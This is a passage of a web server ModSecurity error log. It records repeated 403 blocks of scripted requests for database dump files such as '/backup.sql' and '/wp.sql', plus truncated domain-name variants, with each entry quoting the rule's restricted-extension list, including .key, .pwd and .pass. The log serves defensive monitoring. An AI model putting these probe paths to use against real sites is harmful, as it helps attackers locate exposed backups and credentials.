"/investigacionperu.sql"] [unique_id "ZfeMc5UcmIkonP-N1UHH0gAAANM"] [Sun Mar 17 19:36:04.115585 2024] [:error] [pid 29913:tid 140392934594304] [client 23.129.64.222:48610] [client 23.129.64.222] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/in.sql"] [unique_id "ZfeMdJUcmIkonP-N1UHH0wAAANU"] [Sun Mar 17 19:36:04.782088 2024] [:error] [pid 29913:tid 140392917808896] [client 23.129.64.222:48612] [client 23.129.64.222] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/vestigacionperu.sql"] [unique_id "ZfeMdJUcmIkonP-N1UHH1AAAANc"] [Sun Mar 17 19:36:05.473953 2024] [:error] [pid 29782:tid 140393010128640] [client 23.129.64.222:48614] [client 23.129.64.222] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/stigacionperu.sql"] [unique_id "ZfeMdcIahfcLJE-9sPB8dwAAAIw"] [Sun Mar 17 19:36:08.431258 2024] [:error] [pid 29913:tid 140393001735936] [client 23.129.64.222:48616] [client 23.129.64.222] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/onperu.sql"] [unique_id "ZfeMeJUcmIkonP-N1UHH1QAAAM0"] [Sun Mar 17 19:36:09.581263 2024] [:error] [pid 29913:tid 140392959772416] [client 162.251.5.152:48618] [client 162.251.5.152] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacionper.sql"] [unique_id "ZfeMeZUcmIkonP-N1UHH1gAAANI"] [Sun Mar 17 19:36:10.720641 2024] [:error] [pid 29913:tid 140392926201600] [client 162.251.5.152:48620] [client 162.251.5.152] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigac.sql"] [unique_id "ZfeMepUcmIkonP-N1UHH1wAAANY"] [Sun Mar 17 19:36:11.564887 2024] [:error] [pid 29913:tid 140392909416192] [client 162.251.5.152:48622] [client 162.251.5.152] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backups.sql"] [unique_id "ZfeMe5UcmIkonP-N1UHH2AAAANg"] [Sun Mar 17 19:36:12.348382 2024] [:error] [pid 29780:tid 140393018521344] [client 162.251.5.152:48624] [client 162.251.5.152] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/cionperu.sql"] [unique_id "ZfeMfN6iAjkT29li1LpxfgAAAAs"] [Sun Mar 17 19:36:12.998104 2024] [:error] [pid 29913:tid 140393035306752] [client 162.251.5.152:48626] [client 162.251.5.152] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacionp.sql"] [unique_id "ZfeMfJUcmIkonP-N1UHH2QAAAMk"] [Sun Mar 17 19:36:17.162006 2024] [:error] [pid 29782:tid 140392968165120] [client 162.251.5.152:48628] [client 162.251.5.152] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/nperu.sql"] [unique_id "ZfeMgcIahfcLJE-9sPB8eAAAAJE"] [Sun Mar 17 19:36:18.854560 2024] [:error] [pid 29782:tid 140392951379712] [client 162.251.5.152:48632] [client 162.251.5.152] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/ionperu.sql"] [unique_id "ZfeMgsIahfcLJE-9sPB8egAAAJM"] [Sun Mar 17 19:36:19.512724 2024] [:error] [pid 29782:tid 140393060484864] [client 185.181.61.142:48634] [client 185.181.61.142] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/backup.sql"] [unique_id "ZfeMg8IahfcLJE-9sPB8ewAAAIY"] [Sun Mar 17 19:36:20.483853 2024] [:error] [pid 29913:tid 140393068877568] [client 185.181.61.142:48638] [client 185.181.61.142] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/ru.sql"] [unique_id "ZfeMhJUcmIkonP-N1UHH2gAAAMU"] [Sun Mar 17 19:36:21.176370 2024] [:error] [pid 29780:tid 140392951379712] [client 185.181.61.142:48640] [client 185.181.61.142] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp.sql"] [unique_id "ZfeMhd6iAjkT29li1LpxfwAAABM"] [Sun Mar 17 19:36:21.710348 2024] [:error] [pid 29780:tid 140393026914048] [client 185.181.61.142:48642] [client 185.181.61.142] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/nvestigacionperu.sql"] [unique_id "ZfeMhd6iAjkT29li1LpxgAAAAAo"] [Sun Mar 17 19:36:22.548448 2024] [:error] [pid 29780:tid 140393183991552] [client 185.181.61.142:48644] [client 185.181.61.142] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/inv.sql"] [unique_id "ZfeMht6iAjkT29li1LpxgQAAAAA"] [Sun Mar 17 19:36:23.072802 2024] [:error] [pid 29780:tid 140392984950528] [client 185.181.61.142:48646] [client 185.181.61.142] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/u.sql"] [unique_id "ZfeMh96iAjkT29li1LpxggAAAA8"] [Sun Mar 17 19:36:23.755644 2024] [:error] [pid 29782:tid 140392984950528] [client 185.181.61.142:48648] [client 185.181.61.142] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/invest.sql"] [unique_id "ZfeMh8IahfcLJE-9sPB8fAAAAI8"] [Sun Mar 17 19:36:24.307255 2024] [:error] [pid 29780:tid 140392942987008] [client 185.181.61.142:48650] [client 185.181.61.142] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/igacionperu.sql"] [unique_id "ZfeMiN6iAjkT29li1LpxgwAAABQ"] [Sun Mar 17 19:36:24.804015 2024] [:error] [pid 29780:tid 140392909416192] [client 185.181.61.142:48652] [client 185.181.61.142] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/estigacionperu.sql"] [unique_id "ZfeMiN6iAjkT29li1LpxhAAAABg"] [Sun Mar 17 19:36:25.537926 2024] [:error] [pid 29780:tid 140392976557824] [client 185.181.61.142:48654] [client 185.181.61.142] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/investigacio.sql"] [unique_id "ZfeMid6iAjkT29li1LpxhQAAABA"] [Sun Mar 17 19:36:26.703006 2024] [:error] [pid 29782:tid 140393018521344] [client 185.181.61.142:48656] [client 185.181.61.142] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/.sql"] [unique_id "ZfeMisIahfcLJE-9sPB8fQAAAIs"] [Sun Mar 17 19:36:27.507110 2024] [:error] [pid 29782:tid 140393077270272] [client 185.181.61.142:48658] [client 185.181.61.142] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver 